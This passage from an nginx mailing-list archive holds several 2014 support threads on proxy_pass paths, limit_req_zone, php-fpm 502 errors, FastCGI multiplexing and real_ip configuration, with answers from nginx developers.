/index.php

The content of the /index.php file is:

----------------------------- content -------------------------
./public/index.php
------------------------------------------------------------------

As you can see, the content of this PHP file doesn't have a <?php ?> block, just a relative link to another file, so I'm seeing two different behaviours in windows & linux. Windows) The text "./public/index.php" is shown in the browser and the php processing ends.
Linux) This content is interpreted "like a link" to the /public/index.php file and the content of /public/index.php is processed, without rendering the plain text "./public/index.php" like in windows. Any idea? Perhaps it could be a trivial problem related only with PHP, but I'm just a beginner with both PHP and Nginx. Regards Antonio Fernández www.jaraxa.com Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253207,253207#msg-253207 From vbart at nginx.com Fri Sep 12 11:28:38 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 12 Sep 2014 15:28:38 +0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> References: <20140908115057.GA59236@mdounin.ru> <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1694211.Er3GKaG43R@vbart-workstation> On Thursday 11 September 2014 16:42:51 nfn wrote: > Hi, > > Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS > > Can you help me understand why I have these random 502 error? > > Thanks > Have you looked at dmesg? It doesn't look related to nginx. That can be caused by segfaults in php-fpm processes, so you should check what happens with them. wbr, Valentin V. Bartenev From dewanggaba at xtremenitro.org Sat Sep 13 09:46:56 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 13 Sep 2014 16:46:56 +0700 Subject: Could Nginx redirected proxied traffic? Message-ID: <54141290.70300@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I have configuration like this:

... snip ...
location /monitor {
    proxy_pass http://backend:6800/;
    proxy_redirect default;
}
... snip ...

Trying to access /monitor, it's works.
But, I tried to access URL behind them, /monitor/logs/, /monitor/jobs/ it's error 404, the log said : ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET /jobs HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" But, if I try to access them directly through port 6800 (traffic not proxied from nginx), everything works. I assume, that actually the backend support rewrite URL, but while proxied, the rewrite URL didn't works. Any hints? -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUFBKPAAoJEEyntV5BtO+Q3bAH/RCUkGSFkuLWt0Rgefuh60VE yGxkXDhCa6BnO7Zv4VsvDb6XSYfax/qlmoIL5Grii5GfpjI4Rp3K6rR738JPqIM3 yd3DGmBOJPxPsenf5CFBofXi2k8KxyhSoJDXj9yZ6oszLNZ8JKYYQvIYSbMiqw4/ IMDmhGDHDVuhZB7zhxmxMrFWAn7B6UOuabd+Db3L7tpti1sLAdIkmOSXO+9CVAXA A+ihW1J717K02YK4MO4ycS+Zgz++SC7+nSESpna1+n+UR+ix4NeUo0wDMlhGjkpZ EHWEa5masuNHfXsURcPdzRIMn5IkPiV64WrEvFMN7QvUYgLDSxb8ezHzAg0SBcU= =OGrl -----END PGP SIGNATURE----- From vbart at nginx.com Sat Sep 13 10:29:31 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 13 Sep 2014 14:29:31 +0400 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <54141290.70300@xtremenitro.org> References: <54141290.70300@xtremenitro.org> Message-ID: <11383775.5OveutF6HL@vbart-laptop> On Saturday 13 September 2014 16:46:56 Dewangga wrote: > Hi, > > I have configuration like this : > > ... snip ... > location /monitor { > proxy_pass http://backend:6800/; > proxy_redirect default; > } > ... snip ... > > Trying to access /monitor, it's works. 
But, I tried to access URL > behind them, /monitor/logs/, /monitor/jobs/ it's error 404, the log said : > > ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ HTTP/1.1" 404 > 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux > x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" > ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET /jobs HTTP/1.1" 404 > 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux > x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" > > But, if I try to access them directly through port 6800 (traffic not > proxied from nginx), everything works. I assume, that actually the > backend support rewrite URL, but while proxied, the rewrite URL didn't > works. > > Any hints? > When you access it directly, what URI do you use? wbr, Valentin V. Bartenev From dewanggaba at xtremenitro.org Sat Sep 13 10:29:57 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 13 Sep 2014 17:29:57 +0700 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <11383775.5OveutF6HL@vbart-laptop> References: <54141290.70300@xtremenitro.org> <11383775.5OveutF6HL@vbart-laptop> Message-ID: <54141CA5.1070703@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, The original URI is : http://engine.xtremenitro.org:6800/jobs http://engine.xtremenitro.org:6800/logs .. etc And if proxied, should be: http://engine.xtremenitro.org/monitor/jobs http://engine.xtremenitro.org/monitor/logs .. etc I want to close the unusual port, and proxied to nginx. So I can control the logs only from nginx. Is it possible? On 09/13/2014 05:29 PM, Valentin V. Bartenev wrote: > On Saturday 13 September 2014 16:46:56 Dewangga wrote: >> Hi, >> >> I have configuration like this : >> >> ... snip ... location /monitor { proxy_pass >> http://backend:6800/; proxy_redirect default; } ... snip ... >> >> Trying to access /monitor, it's works. 
But, I tried to access >> URL behind them, /monitor/logs/, /monitor/jobs/ it's error 404, >> the log said : >> >> ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ >> HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 >> Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET >> /jobs HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 >> Firefox/31.0" >> >> But, if I try to access them directly through port 6800 (traffic >> not proxied from nginx), everything works. I assume, that >> actually the backend support rewrite URL, but while proxied, the >> rewrite URL didn't works. >> >> Any hints? >> > > When you access it directly, what URI do you use? > > wbr, Valentin V. Bartenev > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUFBykAAoJEEyntV5BtO+QBloH/RS2fyv7C+RhFLRPZsN5gxB1 XHexEkM9aGo7JwIXAb9JzvkDp6Mm0IGky6v+zWZxZdtHuAWXG5wg29u1BCQvgiUI Zdd9jRfCswMyI4zN+JE7l89URtrGhWPjfqciV69rZApq5pKbaedYkEve8J4jZrL1 wseeWLe9BP3OlOtO/OmcmDL/bdqRgPrmNdnKssAYJ5RXt0QlGpbD2JMqc5K9c8sQ t6fwBLKZrjyJsajUE9tY6K0N2xkLTeBkBEvkX16jrdz7Q6xtTysGFm2LrpXSxnAr 8zuCR1Gjt1HuVxwtQD7bW5PlvgTd6x7vG1iT2/nacdt89WVXz1DOmwokCYuxC3I= =8w6/ -----END PGP SIGNATURE----- From vbart at nginx.com Sat Sep 13 10:42:33 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 13 Sep 2014 14:42:33 +0400 Subject: Could Nginx redirected proxied traffic? 
In-Reply-To: <54141CA5.1070703@xtremenitro.org> References: <54141290.70300@xtremenitro.org> <11383775.5OveutF6HL@vbart-laptop> <54141CA5.1070703@xtremenitro.org> Message-ID: <3235863.PgbdDxD1Zm@vbart-laptop> On Saturday 13 September 2014 17:29:57 Dewangga wrote: > Hi, > > The original URI is : > > http://engine.xtremenitro.org:6800/jobs > http://engine.xtremenitro.org:6800/logs > > .. etc > > And if proxied, should be: > http://engine.xtremenitro.org/monitor/jobs > http://engine.xtremenitro.org/monitor/logs > > .. etc > > I want to close the unusual port, and proxied to nginx. So I can > control the logs only from nginx. > > Is it possible? > First of all, with your config: location /monitor { proxy_pass http://backend:6800/; proxy_redirect default; } "/monitor" part of URI is replaced with "/", so requesting "/monitor/logs/" results in a request to "//logs/", and I'm not sure that your backend is able to handle that. Please, check the documentation: http://nginx.org/r/proxy_pass Probably, all you need is just this: location /monitor/ { proxy_pass http://backend:6800/; } wbr, Valentin V. Bartenev > On 09/13/2014 05:29 PM, Valentin V. Bartenev wrote: > > On Saturday 13 September 2014 16:46:56 Dewangga wrote: > >> Hi, > >> > >> I have configuration like this : > >> > >> ... snip ... location /monitor { proxy_pass > >> http://backend:6800/; proxy_redirect default; } ... snip ... > >> > >> Trying to access /monitor, it's works. 
But, I tried to access > >> URL behind them, /monitor/logs/, /monitor/jobs/ it's error 404, > >> the log said : > >> > >> ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ > >> HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" > >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 > >> Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET > >> /jobs HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" > >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 > >> Firefox/31.0" > >> > >> But, if I try to access them directly through port 6800 (traffic > >> not proxied from nginx), everything works. I assume, that > >> actually the backend support rewrite URL, but while proxied, the > >> rewrite URL didn't works. > >> > >> Any hints? > >> > > > > When you access it directly, what URI do you use? > > > > wbr, Valentin V. Bartenev > > > > _______________________________________________ nginx mailing list > > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > From dewanggaba at xtremenitro.org Sat Sep 13 10:42:51 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 13 Sep 2014 17:42:51 +0700 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <3235863.PgbdDxD1Zm@vbart-laptop> References: <54141290.70300@xtremenitro.org> <11383775.5OveutF6HL@vbart-laptop> <54141CA5.1070703@xtremenitro.org> <3235863.PgbdDxD1Zm@vbart-laptop> Message-ID: <54141FAB.4030202@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi bro, It works! Thanks in a bunch! On 09/13/2014 05:42 PM, Valentin V. Bartenev wrote: > On Saturday 13 September 2014 17:29:57 Dewangga wrote: >> Hi, >> >> The original URI is : >> >> http://engine.xtremenitro.org:6800/jobs >> http://engine.xtremenitro.org:6800/logs >> >> .. 
etc >> >> And if proxied, should be: >> http://engine.xtremenitro.org/monitor/jobs >> http://engine.xtremenitro.org/monitor/logs >> >> .. etc >> >> I want to close the unusual port, and proxied to nginx. So I can >> control the logs only from nginx. >> >> Is it possible? >> > > First of all, with your config: > > location /monitor { proxy_pass http://backend:6800/; proxy_redirect > default; } > > "/monitor" part of URI is replaced with "/", so requesting > "/monitor/logs/" results in a request to "//logs/", and I'm not > sure that your backend is able to handle that. > > Please, check the documentation: http://nginx.org/r/proxy_pass > > Probably, all you need is just this: > > location /monitor/ { proxy_pass http://backend:6800/; } > > wbr, Valentin V. Bartenev > >> On 09/13/2014 05:29 PM, Valentin V. Bartenev wrote: >>> On Saturday 13 September 2014 16:46:56 Dewangga wrote: >>>> Hi, >>>> >>>> I have configuration like this : >>>> >>>> ... snip ... location /monitor { proxy_pass >>>> http://backend:6800/; proxy_redirect default; } ... snip ... >>>> >>>> Trying to access /monitor, it's works. But, I tried to >>>> access URL behind them, /monitor/logs/, /monitor/jobs/ it's >>>> error 404, the log said : >>>> >>>> ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ >>>> HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" >>>> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 >>>> Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] >>>> "GET /jobs HTTP/1.1" 404 599 >>>> "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; >>>> Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" >>>> >>>> But, if I try to access them directly through port 6800 >>>> (traffic not proxied from nginx), everything works. I assume, >>>> that actually the backend support rewrite URL, but while >>>> proxied, the rewrite URL didn't works. >>>> >>>> Any hints? >>>> >>> >>> When you access it directly, what URI do you use? >>> >>> wbr, Valentin V. 
Bartenev >>> >>> _______________________________________________ nginx mailing >>> list nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> _______________________________________________ nginx mailing >> list nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUFB+qAAoJEEyntV5BtO+QId4IAIRv2rg+rJuWG7iQkETKINHZ pS5tDgao7HpmerXi779iiiER/o/o/9dQ+kNtmMHktRp+AdFGDpQM0dgt1In79GbQ vA86hjMhPkboNMF0Ft5m30FS0tLQTEsn408Sh5MdRSr1REQ7llGZSIxzv8nGn9Ie 6qeOkIKuf/9Ooba+JMjP8lAZvEK7tO/OsajL02voCA9f76FFm5Gt+PGp7uoDtWWG WFKLjiEKjq6arhajU7gGMAWvjFYdSyEoGoxxFJ4mPUXQNHGI6xMk44S9D8aDqbJa hs1fJ9mIN4rXvJdQAYFE3w33KK9kEqAJnkSlwwTcQmtp2IVX7owQ0YytCXDYLTk= =j+fG -----END PGP SIGNATURE----- From nginx-forum at nginx.us Sat Sep 13 20:37:05 2014 From: nginx-forum at nginx.us (matt_l) Date: Sat, 13 Sep 2014 16:37:05 -0400 Subject: multiple limit_req_zone Message-ID: <54292c8b1fcc71fec9c100a6c42a312a.NginxMailingListEnglish@forum.nginx.org> Hello Please may I ask a question with respect to limit_req_zone to better understand how it works Can I have multiple limit_re_zone statements? limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; Thank you Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253227,253227#msg-253227 From eliezer at ngtech.co.il Sat Sep 13 20:42:50 2014 From: eliezer at ngtech.co.il (Eliezer Croitoru) Date: Sat, 13 Sep 2014 23:42:50 +0300 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: References: <20140911143750.GZ59236@mdounin.ru> <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> Message-ID: <5414AC4A.2040805@ngtech.co.il> Or reiserfs... 
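[Editor's sketch tying the filesystem suggestions in this thread back to Maxim's earlier "df -i" hint: ENOSPC from open() while df -h shows free space almost always means the inode table is full, since every small cached file costs one inode regardless of its size. "/" below is a stand-in for the real cache mount point such as /cache.]

```shell
# Compare block usage vs. inode usage for the same filesystem; a cache of
# many tiny files can exhaust inodes long before it exhausts blocks.
df -h /    # block usage -- may look perfectly healthy
df -i /    # inode usage -- IUse% at 100% reproduces the ENOSPC symptom
```

ext4 fixes its inode count when the filesystem is created (mkfs.ext4 -N/-i), while XFS allocates inodes dynamically, which is what the xfs/reiserfs suggestions above are getting at.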
Eliezer On 09/12/2014 04:27 AM, NitrouZ wrote: > What file system do you use for cache? Try using xfs instead ext4. > Xfs have better inode storage than ext4. From vbart at nginx.com Sat Sep 13 20:48:10 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sun, 14 Sep 2014 00:48:10 +0400 Subject: multiple limit_req_zone In-Reply-To: <54292c8b1fcc71fec9c100a6c42a312a.NginxMailingListEnglish@forum.nginx.org> References: <54292c8b1fcc71fec9c100a6c42a312a.NginxMailingListEnglish@forum.nginx.org> Message-ID: <15179956.xznibnbotN@vbart-laptop> On Saturday 13 September 2014 16:37:05 matt_l wrote: > Hello > > Please may I ask a question with respect to limit_req_zone to better > understand how it works > > Can I have multiple limit_re_zone statements? Of course, you can. > > limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; > limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; > This defines two separate memory zones with different names, where information about requests can be collected. Please note that these directives alone don't do anything useful. To actually apply the limit, you also need to specify the limit_req directive. See the documentation: http://nginx.org/en/docs/http/ngx_http_limit_req_module.html wbr, Valentin V. Bartenev From nginx-forum at nginx.us Sat Sep 13 22:07:31 2014 From: nginx-forum at nginx.us (matt_l) Date: Sat, 13 Sep 2014 18:07:31 -0400 Subject: multiple limit_req_zone In-Reply-To: <15179956.xznibnbotN@vbart-laptop> References: <15179956.xznibnbotN@vbart-laptop> Message-ID: <199df682b4157f8eb51a93398f48b4d7.NginxMailingListEnglish@forum.nginx.org> Valentin Thank you very much for your response. What would be a use case where one would define multiple limit_req_zone? 
For example, I would assume that the following limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; is completely equivalent to limit_req_zone $binary_remote_addr zone=two:20m rate=10r/s; I am thinking that one would want to have multiple limit_req_zone if one wants different rates and zone sizes? On a separate note, how does one decides the size needed for zone? Thank you for your help Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253227,253230#msg-253230 From lists at ruby-forum.com Sat Sep 13 22:28:30 2014 From: lists at ruby-forum.com (Sam J.) Date: Sun, 14 Sep 2014 00:28:30 +0200 Subject: nginx as a forward proxy (kind of) Message-ID: <65918e4ea8fbcb834d4a93c1be8345bb@ruby-forum.com> Hi I am very new to nginx and have a quick question. I am using nginx to basically redirect certain websites through another proxy. I am using DNS to resolve *.domain.com to the IP address of nginx server. I am able to get it to work with www.domain.com (see sample config below) but would like it to redirect any subdomain (wildcard) to corresponding subdomain. Any way to do this without having a similar config for each subdomain? server { listen 192.168.1.80:443; server_name *.domain.com; ssl on; ssl_certificate /tmp/test_cert.crt; ssl_certificate_key /tmp/test_cert.key; access_log /var/log/nginx/log/www.example.access.log main; error_log /var/log/nginx/log/www.example.error.log; location / { proxy_pass https://www.domain.com; } } -- Posted via http://www.ruby-forum.com/. From vbart at nginx.com Sat Sep 13 23:13:02 2014 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Sun, 14 Sep 2014 03:13:02 +0400 Subject: multiple limit_req_zone In-Reply-To: <199df682b4157f8eb51a93398f48b4d7.NginxMailingListEnglish@forum.nginx.org> References: <15179956.xznibnbotN@vbart-laptop> <199df682b4157f8eb51a93398f48b4d7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1443902.uLfRjDonPW@vbart-laptop> On Saturday 13 September 2014 18:07:31 matt_l wrote: > Valentin > > Thank you very much for your response. > > What would be a use case where one would define multiple limit_req_zone? > > For example, I would assume that the following > > limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s; > limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s; > > is completely equivalent to > > limit_req_zone $binary_remote_addr zone=two:20m rate=10r/s; > > I am thinking that one would want to have multiple limit_req_zone if one > wants different rates and zone sizes? Well, no. It's not equivalent to one zone with a bigger size. Can you see the difference between this config:

limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s;
limit_req_zone $binary_remote_addr zone=two:10m rate=10r/s;

server {
    server_name one.example.org;
    limit_req zone=one burst=10;
}

server {
    server_name two.example.org;
    limit_req zone=two burst=10;
}

and this one:

limit_req_zone $binary_remote_addr zone=both:20m rate=10r/s;

server {
    server_name one.example.org;
    limit_req zone=both burst=10;
}

server {
    server_name two.example.org;
    limit_req zone=both burst=10;
}

? With the first configuration a client is able to request one.example.org and two.example.org with up to 10 rps at the same time. But with the last one the limitation is shared between the servers, since they share the same limit zone. > > On a separate note, how does one decides the size needed for zone? > A quote from http://nginx.org/r/limit_req_zone | A client IP address serves as a key.
Note that instead of
| $remote_addr, the $binary_remote_addr variable is used here,
| that allows decreasing the state size down to 64 bytes.
| One megabyte zone can keep about 16 thousand 64-byte states.

wbr, Valentin V. Bartenev From aircw2005 at gmail.com Sun Sep 14 04:18:19 2014 From: aircw2005 at gmail.com (Wei Chen) Date: Sat, 13 Sep 2014 21:18:19 -0700 Subject: How to measure time spent on response compression for Nginx? Message-ID: Hi folks: We want to measure how long Nginx takes to compress certain response with Gzip format. Is there any way/tool to get accurate timing? Thanks, -Wei From artemrts at ukr.net Sun Sep 14 16:08:24 2014 From: artemrts at ukr.net (wishmaster) Date: Sun, 14 Sep 2014 19:08:24 +0300 Subject: How to measure time spent on response compression for Nginx? In-Reply-To: References: Message-ID: <1410710869.546025443.gcgnc2nz@frv34.fwdcdn.com> --- Original message --- From: "Wei Chen" Date: 14 September 2014, 07:18:40 > Hi folks: > > We want to measure how long Nginx takes to compress certain response > with Gzip format. Is there any way/tool to get accurate timing? > You can find some information about gzip on the Calomel.org website: https://calomel.org/nginx.html (see the gzip_comp_level section) From lists at ruby-forum.com Sun Sep 14 19:22:48 2014 From: lists at ruby-forum.com (Wter S.) Date: Sun, 14 Sep 2014 21:22:48 +0200 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: <20130311121220.GX15378@mdounin.ru> References: <20130311121220.GX15378@mdounin.ru> Message-ID: Question about FastCGI: How it handle simultaneous connections with one process when PHP itself is blocking language ? What if I have something "sleep(100)" . Wont it block the process for the other users ? Thanks Maxim Dounin wrote in post #1101079: > Hello!
> > On Sat, Mar 09, 2013 at 10:43:47PM +0800, Ji Zhang wrote: > >> >> But I also find an interesting article on how great this feature is, >> back to 2002: >> http://www.nongnu.org/fastcgi/#multiplexing > > This article seems to confuse FastCGI multiplexing with > event-based programming. Handling multiple requests in a single > process is great - and nginx does so. But you don't need FastCGI > multiplexing to do it. > >> and perform asynchronously. >> >> Does my point make sense? or some other more substantial reasons? > > You are correct, since FastCGI is used mostly for local > communication, multiplexing on application level isn't expected to > be beneficial. Another reason is that multiplexing isn't > supported (and probably will never be) by the major FastCGI > application - PHP. > > There were several discussions on FastCGI multiplexing here, and > general consensus seems to be that FastCGI multiplexing might > be useful to reduce costs of multiple long-polling connections to > an application, as it will reduce number of sockets OS will have > to maintain. It's yet to be demonstrated though. > > -- > Maxim Dounin > http://nginx.org/en/donation.html -- Posted via http://www.ruby-forum.com/. From mdounin at mdounin.ru Mon Sep 15 10:43:33 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 14:43:33 +0400 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: References: <20130311121220.GX15378@mdounin.ru> Message-ID: <20140915104333.GH59236@mdounin.ru> Hello! On Sun, Sep 14, 2014 at 09:22:48PM +0200, Wter S. wrote: > Question about FastCGI: How it handle simultaneous connections with one > process when PHP itself is blocking language ? What if I have something > "sleep(100)" . Wont it block the process for the other users ? > Thanks FastCGI doesn't imply PHP (and, actually, PHP doesn't imply blocking as well - there are some event-driven PHP frameworks out there). 
As of now, implementation of the FastCGI protocol in PHP doesn't support FastCGI multiplexing at all, and that's one of the reasons why nginx doesn't implement FastCGI multiplexing as well. Quoting the message you've replied to: > > ... Another reason is that multiplexing isn't > > supported (and probably will never be) by the major FastCGI > > application - PHP. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Mon Sep 15 10:51:30 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 14:51:30 +0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> References: <20140908115057.GA59236@mdounin.ru> <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915105129.GI59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 04:42:51PM -0400, nfn wrote: > Hi, > > Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS > > Can you help me understand why I have these random 502 error? As previously suggested, there is an error logged at "error" level: 2014/09/09 23:55:59 [error] 31744#0: *35461 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 0.0.0.0, server: www.example.com, request: "POST /index.php?app=members&module=messaging&section=send&do=sendReply&topicID=54192 HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "www.example.com", referrer: "http://www.example.com/index.php?app=members&module=messaging&section=view&do=showConversation&topicID=54192&st=200" As others already explained, the message suggests there is something wrong with your backend, most likely it dies for some reason.
-- Maxim Dounin http://nginx.org/ From r_o_l_a_n_d at hotmail.com Mon Sep 15 11:57:34 2014 From: r_o_l_a_n_d at hotmail.com (Roland RoLaNd) Date: Mon, 15 Sep 2014 14:57:34 +0300 Subject: trouble changing uri to query string Message-ID: i have a url looking as such: mysite.com/some/path/rest/v2/giveit.view&user=282&imageid=23&size=80 i want the cache key to match imageid=23&size=80 without the "user" part. $args isn't matching because the incoming url lacks the "?" part, so $uri is detected as mysite.com/some/path/rest/v2/giveit.view&imageid=23&size=80 Is there a way i could force nginx to detect that query string, or rewrite/set the args on each request? From nginx-forum at nginx.us Mon Sep 15 12:08:10 2014 From: nginx-forum at nginx.us (nkolev) Date: Mon, 15 Sep 2014 08:08:10 -0400 Subject: nginx chunked transfer encoding, cannot get it to work Message-ID: <67b49423c2351c8e547dd3b827386570.NginxMailingListEnglish@forum.nginx.org> I am using an implementation of nginx with jetty servlets. For the purpose of my project I need to initialize two connections to the jetty servlet and keep them open. To initialize the downlink I use a normal request and I get the inputstream back. To initialize the uplink I use a chunked encoding request. I use a 1.4.6 nginx version, so chunked encoding should be on by default; regardless, I set it in my server definition. Here's the code for my server.

#HTTPS server
server {
    listen 443;
    listen [::]:443;
    server_name localhost;

    ssl on;
    ssl_certificate /etc/nginx/ssl/server.crt;
    ssl_certificate_key /etc/nginx/ssl/server.key;
    ssl_session_timeout 5m;
    ssl_protocols SSLv2 SSLv3 TLSv1;
    ssl_ciphers HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers on;

    location / {
        proxy_http_version 1.1;
        expires off;
        proxy_buffering off;
        chunked_transfer_encoding on;
        proxy_pass https://127.0.0.1:8080;
        # root html;
        # index index.html index.htm;
    }
}

How can I get the nginx chunked transfer encoding downlink to work?
I have also done simple tests to make sure that it's not my app's implementation that's blocking it somehow, and it still doesn't work. Any ideas? Thanks :) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253246,253246#msg-253246 From nginx-forum at nginx.us Mon Sep 15 13:11:37 2014 From: nginx-forum at nginx.us (ianjoneill) Date: Mon, 15 Sep 2014 09:11:37 -0400 Subject: Nginx real_ip_recursive Message-ID: <0dada9dd996a935b7cb504174698bc02.NginxMailingListEnglish@forum.nginx.org> Hello, I am using nginx to proxy connections to a server I have written in Java, which serves connections on port 8080. I am trying to use the X-Forwarded-For header to identify the real IP address of a connection, but I am running into difficulties with the nginx setting real_ip_recursive. My nginx config file example_vhost in /etc/nginx/sites-enabled/:

server {
    listen *:80;
    server_name example.com;
    index index.html index.htm index.php;

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_read_timeout 90;
        proxy_connect_timeout 90;
        proxy_redirect off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        #proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        set_real_ip_from 127.0.0.1;
        real_ip_header X-Forwarded-For;
        real_ip_recursive on;
    }
}

This proxies requests onto my server as I expect, but I do not receive the correct IP address in the X-Forwarded-For header. If I connect to the server from a different IP address, spoofing the X-Forwarded-For header, I do not get the IP address of the machine, but rather get the spoofed addresses.
Example with curl on client machine 10.0.2.2: $ curl -I --header "X-Forwarded-For: 1.1.1.1, 2.2.2.2" 10.0.2.15 Headers as received by my proxied Java server (extracted using tcpdump) on server machine 10.0.2.15: $ sudo /usr/sbin/tcpdump -i lo -A -s 0 'tcp port 8080 and ( ((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes 13:50:13.338901 IP localhost.50997 > localhost.8080: Flags [P.], seq 3051450771: 3051450976, ack 3527489033, win 4099, options [nop,nop,TS val 1891289 ecr 189128 9], length 205 E....M at .@............5"...q..A6 ........... ........HEAD / HTTP/1.0 Host: localhost X-Real-IP: 10.0.2.2 Connection: close User-Agent: curl/7.30.0 Accept: */* X-Forwarded-For: 1.1.1.1, 2.2.2.2 I assume I have got the nginx configuration wrong, but I am not sure how. I am using nginx/1.6.1 on debian Wheezy 7.6, and the output of nginx -V includes --with-http_realip_module. Thanks for any help in advance. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253247,253247#msg-253247 From mdounin at mdounin.ru Mon Sep 15 13:25:49 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 17:25:49 +0400 Subject: Nginx real_ip_recursive In-Reply-To: <0dada9dd996a935b7cb504174698bc02.NginxMailingListEnglish@forum.nginx.org> References: <0dada9dd996a935b7cb504174698bc02.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915132549.GL59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 09:11:37AM -0400, ianjoneill wrote: > Hello, > > I am using nginx to proxy connections to a server I have written in Java, > which serves connections on port 8080. I am trying to use the > X-Forwarded-For header to identify the real IP address of a 